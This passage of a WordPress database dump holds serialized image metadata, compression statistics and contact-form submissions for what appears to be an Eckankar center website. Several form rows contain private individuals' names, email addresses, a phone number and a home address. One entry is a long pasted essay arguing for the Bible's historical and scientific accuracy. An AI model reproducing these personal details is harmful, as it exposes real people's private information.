{s:4:\"file\";s:31:\"about-background-8-1219x500.jpg\";s:5:\"width\";i:1219;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:30:\"about-background-8-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:30:\"about-background-8-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcslider\";a:4:{s:4:\"file\";s:31:\"about-background-8-1100x500.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(89183,259263,'original-file','2020/02/about-background-8-updraft-pre-smush-original.jpg'),(89184,259263,'smush-complete','1'),(89185,259263,'smush-info','The file was compressed from 475.09 KB to 450.18 KB saving 5.24 percent using WP-Optimize'),(89186,259263,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:486496;s:12:\"smushed-size\";i:460988;s:15:\"savings-percent\";d:5.24;}'),(89199,81469,'_edit_lock','1583099250:2'),(89204,242994,'_edit_lock','1582864321:2'),(89209,242994,'original-file','2020/01/about-background-sized-updraft-pre-smush-original.jpg'),(89210,242994,'smush-complete','1'),(89211,242994,'smush-info','The file was compressed from 173.84 KB to 163.87 KB saving 5.74 percent using WP-Optimize'),(89212,242994,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:178011;s:12:\"smushed-size\";i:167802;s:15:\"savings-percent\";d:5.74;}'),(89297,259324,'protect_children',''),(89307,259324,'_edit_lock','1599075288:2'),(89308,259324,'_edit_last','2'),(89313,259324,'_wp_page_template','default'),(89314,259324,'boldgrid_hide_page_title','0'),(89315,259324,'boldgrid_in_page_containers','1'),(89325,259324,'bgseo_robots_index','index'),(89326,259324,'bgseo_robots_follow','follow'),(92057,261525,'_field_225','steinberg'),(89592,259639,'protect_children',''),(89602,259639,'_edit_lock','1675806058:2'),(89603,259639,'_edit_last','2'),(89604,259639,'_wp_page_template','default'),(89605,259639,'boldgrid_hide_page_title','0'),(89606,259639,'boldgrid_in_page_containers','1'),(89607,259639,'bgseo_robots_index','index'),(89608,259639,'bgseo_robots_follow','follow'),(89685,259733,'protect_children',''),(89695,259733,'_edit_lock','1675805957:2'),(89696,259733,'_edit_last','2'),(193898,269231,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:328706;s:12:\"smushed-size\";i:302453;s:15:\"savings-percent\";d:7.9900000000000002131628207280300557613372802734375;s:10:\"sizes-info\";a:11:{s:4:\"full\";a:2:{s:8:\"original\";i:328706;s:10:\"compressed\";i:302453;}s:6:\"medium\";a:2:{s:8:\"original\";i:15288;s:10:\"compressed\";i:15216;}s:5:\"large\";a:2:{s:8:\"original\";i:98150;s:10:\"compressed\";i:96034;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:5971;s:10:\"compressed\";i:5813;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:59034;s:10:\"compressed\";i:57741;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:19771;s:10:\"compressed\";i:19062;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:47075;s:10:\"compressed\";i:45948;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:30960;s:10:\"compressed\";i:30440;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:21641;s:10:\"compressed\";i:21320;}s:8:\"tileview\";a:2:{s:8:\"original\";i:24899;s:10:\"compressed\";i:23730;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:192620;s:10:\"compressed\";i:189738;}}}'),(92058,261525,'_field_226','michael@michaelsteinberg.com'),(92056,261525,'_field_224','michael'),(90160,260231,'_field_133','Roger'),(90161,260231,'_field_134','Harwell'),(90162,260231,'_field_135','rharwell@glhn.com'),(90163,260231,'_field_137','ECK Center Management'),(90164,260231,'_field_138','Our Arizona Satsang Society is looking  to establish an ECK Center in the Phoenix area and I would like to speak to your Center Administrators to learn how you operate your Centers so we can pattern our operations after yours.\n\nPlease let me know how I can speak to those individuals.\n\nRoger Harwell\nArizona Administrative Services Director\nTucson Az\n520-743-3705'),(90165,260231,'_form_id','13'),(90166,260231,'_seq_num','43'),(90306,81469,'smush-complete','1'),(90307,81469,'smush-info','The file was compressed from 507.92 KB to 493.59 KB saving 2.82 percent using WP-Optimize'),(90308,81469,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:520107;s:12:\"smushed-size\";i:505433;s:15:\"savings-percent\";d:2.82;}'),(90313,38781,'_edit_lock','1583099501:2'),(90318,38781,'original-file','2019/07/spex-intropix-1-updraft-pre-smush-original.jpg'),(90319,38781,'smush-complete','1'),(90320,38781,'smush-info','The file was compressed from 253.21 KB to 242.81 KB saving 4.11 percent using WP-Optimize'),(90321,38781,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:259289;s:12:\"smushed-size\";i:248638;s:15:\"savings-percent\";d:4.11;}'),(90322,80983,'original-file','2019/08/moon-grass-updraft-pre-smush-original.jpg'),(90323,80983,'smush-complete','1'),(90324,80983,'smush-info','The file was compressed from 528.42 KB to 508.52 KB saving 3.77 percent using WP-Optimize'),(90325,80983,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:541107;s:12:\"smushed-size\";i:520720;s:15:\"savings-percent\";d:3.77;}'),(90330,80323,'original-file','2019/08/water-rocks-2-updraft-pre-smush-original.jpg'),(90331,80323,'smush-complete','1'),(90332,80323,'smush-info','The file was compressed from 578.01 KB to 539.36 KB saving 6.69 percent using WP-Optimize'),(90333,80323,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:591883;s:12:\"smushed-size\";i:552304;s:15:\"savings-percent\";d:6.69;}'),(90334,78665,'original-file','2019/07/rocks-water-updraft-pre-smush-original.jpg'),(90335,78665,'smush-complete','1'),(90336,78665,'smush-info','The file was compressed from 558.68 KB to 537.40 KB saving 3.81 percent using WP-Optimize'),(90337,78665,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:572084;s:12:\"smushed-size\";i:550295;s:15:\"savings-percent\";d:3.81;}'),(90338,127458,'original-file','2019/08/404-page-pup-sorry-2-updraft-pre-smush-original.jpg'),(90339,127458,'smush-complete','1'),(90340,127458,'smush-info','The file was compressed from 70.65 KB to 67.38 KB saving 4.63 percent using WP-Optimize'),(90341,127458,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:72349;s:12:\"smushed-size\";i:69001;s:15:\"savings-percent\";d:4.63;}'),(90342,198738,'original-file','2019/10/blue-moon-updraft-pre-smush-original.jpg'),(90343,198738,'smush-complete','1'),(90344,198738,'smush-info','The file was compressed from 20.28 KB to 19.53 KB saving 3.71 percent using WP-Optimize'),(90345,198738,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:20765;s:12:\"smushed-size\";i:19994;s:15:\"savings-percent\";d:3.71;}'),(90418,260418,'smush-complete',''),(90749,260631,'_field_224','Mike'),(90750,260631,'_field_225','Protzik'),(90751,260631,'_field_226','mikeprotzik@yahoo.com'),(90752,260631,'_field_227','CO'),(90753,260631,'_field_228','US'),(90754,260631,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(90755,260631,'_form_id','21'),(90756,260631,'_seq_num','90'),(92045,261524,'_field_30','Karina'),(92046,261524,'_field_31','Volpe'),(92047,261524,'_field_32','(720) 530-8116'),(92048,261524,'_field_33','kvbiz@icloud.com'),(92049,261524,'_field_34','856 Applewood Dr'),(92050,261524,'_field_35','Lafayette'),(92051,261524,'_field_36','CO'),(92052,261524,'_field_37','US'),(92053,261524,'_field_39',''),(92054,261524,'_form_id','4'),(92055,261524,'_seq_num','6'),(92059,261525,'_field_227','MN'),(92060,261525,'_field_228','US'),(92061,261525,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(92062,261525,'_form_id','21'),(92063,261525,'_seq_num','93'),(92064,261526,'_field_133','eva'),(92065,261526,'_field_134','sciano'),(92066,261526,'_field_135','ev.sciano@trx.net'),(92067,261526,'_field_137','Evidence from Scripture'),(92068,261526,'_field_138','Evidence from Scripture\n\nAuthentic Text\n\nMany powerful men over the centuries have tried to discredit or destroy the Bible. All have failed. There is more evidence for the authenticity and accuracy of the Scriptures than for any other ancient book. No one who has studied these issues doubts the genuineness of the Bible. Many, however, reject its message.\n\nThe Manuscripts\n\nThere is more evidence for the Bible’s authenticity than for any literature of antiquity. Textual analysis begins with historical investigation, beginning with the latest documents and working backward. As evidence develops, the data is evaluated against other sources. The record is then checked for consistency of information, and the claims are analyzed as if it were a legal case, looking for credible testimony with cross-examination. There is an enormous amount of evidence for authenticity of the biblical manuscripts.\n\nThe New Testament was written in first century A.D. There are some 20,000 manuscripts in existence. The earliest textual evidence we have was copied 100 years after the original. In contrast:\n\n•	Caesar’s Gallic Wars was written in the first century B.C. There are only 10 manuscripts in existence. The earliest textual evidence we have was copied 1,000 years after the original.\n•	Aristotle’s Poetics was written in the fourth century B.C. There are only 5 manuscripts in existence. The earliest textual evidence we have was copied 1,400 years after the original.\n\nThere are many more writings of the Church Fathers quoting sections of Scripture; we could reconstruct the entire New Testament from their writings alone. There were millions of man-hours spent in cross-checking the manuscripts. There remains only 1 percent of all New Testament words about which questions still exist; no questionable passage contradicts any Bible teaching.\n\nThe Old Testament has been more accurately transmitted to us than any other ancient writing of comparable age. The textual evidence is greater for both the Old and New Testaments than any other historically reliable ancient document. The ancient scribes were very meticulous. There were only 1,200 variant readings in A.D. 500.\n\nThe Masorites produced an official text in A.D. 500. There are other versions that confirm the accuracy of the Masoritic Text.\n\n•	Samaritan Pentateuch: 400 B.C.\n•	Septuagint Greek: 280 B.C.\n•	Dead Sea Scrolls: 0 A.D.\n•	Latin Vulgate: 400 A.D.\n\nThe quotations from pre-Christian writing confirm the text. The New Testament accepts the Old Testament as authentic, confirming the traditional authors, quoting from at least 320 different passages, and confirming the supernatural events cited in the Old Testament.\n\nThe Message\n\nThere are over 3,000 different religions in the world, all of which claim to teach the way to eternal happiness. It has often been said that each of them provides a different path to the same end, and that men are free to choose the path that best suits their own disposition and culture. The Word of God is insistent that this is not so!\n\nThe Bible insists that the God of the Bible is the only true God (Isaiah 44:6; 45:5-6) and that Jesus Christ is the only way to God (John 14:6). All other religions, while stressing their “paths,” would allow for some other contingency.\n\nThe Bible insists that it is the only true revelation, that its words are not to be changed (Proverbs 30:5-6;Revelation 22:18-19), and that its words are the basis of all judgment (John 12:47-50).\n\nThe Bible has a unique account of origins (Genesis 1-11). All others are either evolutionary or pantheistic, with eternity of matter as the “beginning.” The biblical account of origins is unique in both quality and quantity of information.\n\nThe Bible has a unique historical basis. Other religions are based on the subjective teachings of their founders. Biblical teachings are based on objective and demonstrable facts: creation, the fall, the flood, the life and work of redemption of Christ.\n\nThe Bible teaches a unique plan of redemption. It reveals a unique Savior.\n\n•	He was born of a virgin (Isaiah 7:14; Matthew 1:18-25).\n•	He lived a sinless life (Hebrews 4:14-16).\n•	He taught as no other man taught (John 7:46; Matthew 7:28-29).\n•	He died a unique, volitional death (John 10:17-18; Luke 23:46).\n•	He had unique victory over death (Acts 17:31; 1 Corinthians 15:3-8).\n\nThe Bible demands a unique salvation.\n\n•	Perfect holiness is required (Romans 3:10-18, 23; 6:23).\n•	Substitutionary atonement is the only means of reconciliation (Hebrews 10:4-14; Romans 3:24-26).\n•	Grace is the only measurement (Ephesians 2:8-10; Romans 11:5-6).\n\nOther religions require some form of works or participation.\n\nAccurate Data\n\nThe Bible is unique among all books. Not only is it different in its form, structure, and history, but it takes the position of supernatural superiority to all other communication. It insists on total accuracy for its content and absolute obedience to its commands. No other book is so demanding.\n\nHistorical Accuracy\n\nThe Bible has proven to be more historically and archaeologically accurate than any other ancient book. It has been subjected to the minutest scientific textual analysis possible to humanity and has been proven to be authentic in every way.\n\nGenesis Is Historically True\nThe most controversial book of the Bible is Genesis, especially the first eleven chapters. Those chapters speak of the creation of the universe, the fall of man into sin, the world-wide flood of Noah, and the language-altering event at Babel. There is much evidence that these events are historically accurate. \n\nBiblical Data Is Historically Testable\n\nHistorical evidence routinely includes ancient literature, business records, and government documents, analyzed in conjunction with linguistics, geography, and archaeological analysis of physical objects (pottery, coins, remains of buildings, etc.), using forensic science techniques.\nAfter many millions of man-hours of research and evidence analysis, archaeology has repeatedly confirmed the reliability of the Bible. The Bible has been proven geographically and re-proven historically accurate, in the most exacting detail, by external evidences.\n\n\nScientific Accuracy\n\nMany would suggest that the Bible is an antiquated religious book, filled with scientific fallacies and mistakes. Others believe that the Bible is a book of true religion, but dealing solely with spiritual subjects, with any matters of science and history to be interpreted spiritually or allegorically.\n\nEither the Bible is wholly reliable on every subject with which it deals, or it is not the Word of God.\n\nAlthough the Bible is obviously not a science textbook (otherwise it would be continuously out of date), the Bible does contain all the basic principles upon which true science is built. The Bible abounds with references to nature and natural processes, and thus frequently touches on the various sciences. For instance, there are many passages that deal with principles of hydrology, geology, astronomy, meteorology, biology, physics, cosmology, and the grand principles of the space-mass/energy-time continuum.\n\nAgain, if the God revealed in the Bible truly exists, then everything that He reveals would of necessity be true.\n\nOne often hears of mistakes or errors in the Bible. Seldom, when confronted, is there an example provided. When such “errors” are cited, they fall into three kinds of alleged mistakes: 1) mathematical rounding, 2) relative motion, or 3) miracles. Obviously, mathematical rounding is both scientific and in constant use today, as is the use of relative motion for all sorts of navigation and distance calculations. To deny the miraculous is to assume that one is omniscient.\n\nJust as the Bible has become a source book for history and archaeology, so it is also a source book for the foundational principles of science. Those who ignore the information of Scripture will be “ever learning, and never able to come to the knowledge of the truth” (2 Timothy 3:7).\n\nReliable Eyewitnesses\n\nThe Bible, like many books, was written by eyewitnesses (Luke 1:2; 2 Peter 2:16) to the events and circumstances that they recorded. That they were trustworthy witnesses is only to be expected, since God inspired them to co-author their respective portions of the Bible. But some ask: how can we know if the Bible’s human co-authors were really reliable eyewitnesses?\n\nThe following eyewitness traits are the ones emphasized in common law, in law school, and in the Rules of Evidence.\n\nA reliable witness will evidence honesty by his/her sincerity of speech, and be clearly motivated by a drive to speak the truth. The quality of a witness’s observations can be observed by accurate memory, evidenced often by access to accurate records. The competency of his/her communication will be demonstrated by an ability to recall and describe observations, with accurate information and relevant details. Testimonial consistency is also a key factor in reliability.\n\nThough each witness will provide idiosyncratic differences (due to different perspectives and interests), all Scripture has perfect evidentiary consistency. Matthew, Mark, Luke, John, Paul, Moses, Daniel, Jude, and all of the other Bible’s co-authors qualify as impeccably reliable eyewitnesses. Many of the Bible’s writers suffered cruel treatment, even death, for their stand on their witness. To the obvious credibility of their writings is added the unshakeable belief that their testimony was so true that it was worth suffering and dying for.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n'),(90809,260634,'_field_224','Peter'),(90810,260634,'_field_225','Thompson'),(90811,260634,'_field_226','pthompson@morrisbb.net'),(90812,260634,'_field_227','CO'),(90813,260634,'_field_228','US'),(90814,260634,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(90815,260634,'_form_id','21'),(90816,260634,'_seq_num','91'),(143419,265125,'_field_426','Sapphire'),(90826,260644,'_wp_attached_file','2020/03/blue-amber-flowers.jpg'),(90827,260644,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:317;s:6:\"height\";i:212;s:4:\"file\";s:30:\"2020/03/blue-amber-flowers.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"blue-amber-flowers-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"blue-amber-flowers-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:28:\"blue-amber-flowers-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:30:\"blue-amber-flowers-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:30:\"blue-amber-flowers-250x167.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:167;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:30:\"blue-amber-flowers-269x180.jpg\";s:5:\"width\";i:269;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:30:\"blue-amber-flowers-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(90828,260645,'_wp_attached_file','2020/03/blue-flower.jpg'),(90829,260645,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:376;s:6:\"height\";i:212;s:4:\"file\";s:23:\"2020/03/blue-flower.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"blue-flower-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"blue-flower-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:21:\"blue-flower-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:23:\"blue-flower-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:23:\"blue-flower-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:23:\"blue-flower-319x180.jpg\";s:5:\"width\";i:319;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:23:\"blue-flower-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(90830,260646,'_wp_attached_file','2020/03/blue-fog-branch.jpg'),(90831,260646,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:338;s:6:\"height\";i:212;s:4:\"file\";s:27:\"2020/03/blue-fog-branch.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"blue-fog-branch-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"blue-fog-branch-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:25:\"blue-fog-branch-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:27:\"blue-fog-branch-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:27:\"blue-fog-branch-250x157.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:157;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:27:\"blue-fog-branch-287x180.jpg\";s:5:\"width\";i:287;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:27:\"blue-fog-branch-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(90832,260647,'_wp_attached_file','2020/03/blue-rose-1.jpg'),(90833,260647,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:338;s:6:\"height\";i:212;s:4:\"file\";s:23:\"2020/03/blue-rose-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"blue-rose-1-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"blue-rose-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:21:\"blue-rose-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:23:\"blue-rose-1-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:23:\"blue-rose-1-250x157.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:157;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:23:\"blue-rose-1-287x180.jpg\";s:5:\"width\";i:287;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:23:\"blue-rose-1-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(90834,260648,'_wp_attached_file','2020/03/blue-water-rose.jpg'),(90835,260648,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:375;s:6:\"height\";i:212;s:4:\"file\";s:27:\"2020/03/blue-water-rose.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"blue-water-rose-300x170.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:170;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"blue-water-rose-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:25:\"blue-water-rose-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:27:\"blue-water-rose-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:27:\"blue-water-rose-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:27:\"blue-water-rose-318x180.jpg\";s:5:\"width\";i:318;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:27:\"blue-water-rose-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(90836,260649,'_wp_attached_file','2020/03/daisy.jpg'),(90837,260649,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:324;s:6:\"height\";i:212;s:4:\"file\";s:17:\"2020/03/daisy.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"daisy-300x196.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"daisy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:15:\"daisy-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:17:\"daisy-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:17:\"daisy-250x164.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:164;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:17:\"daisy-275x180.jpg\";s:5:\"width\";i:275;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:17:\"daisy-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(90838,260650,'_wp_attached_file','2020/03/girl-kite.jpg'),(90839,260650,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:338;s:6:\"height\";i:212;s:4:\"file\";s:21:\"2020/03/girl-kite.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"girl-kite-300x188.jpg\";s:5:\"wid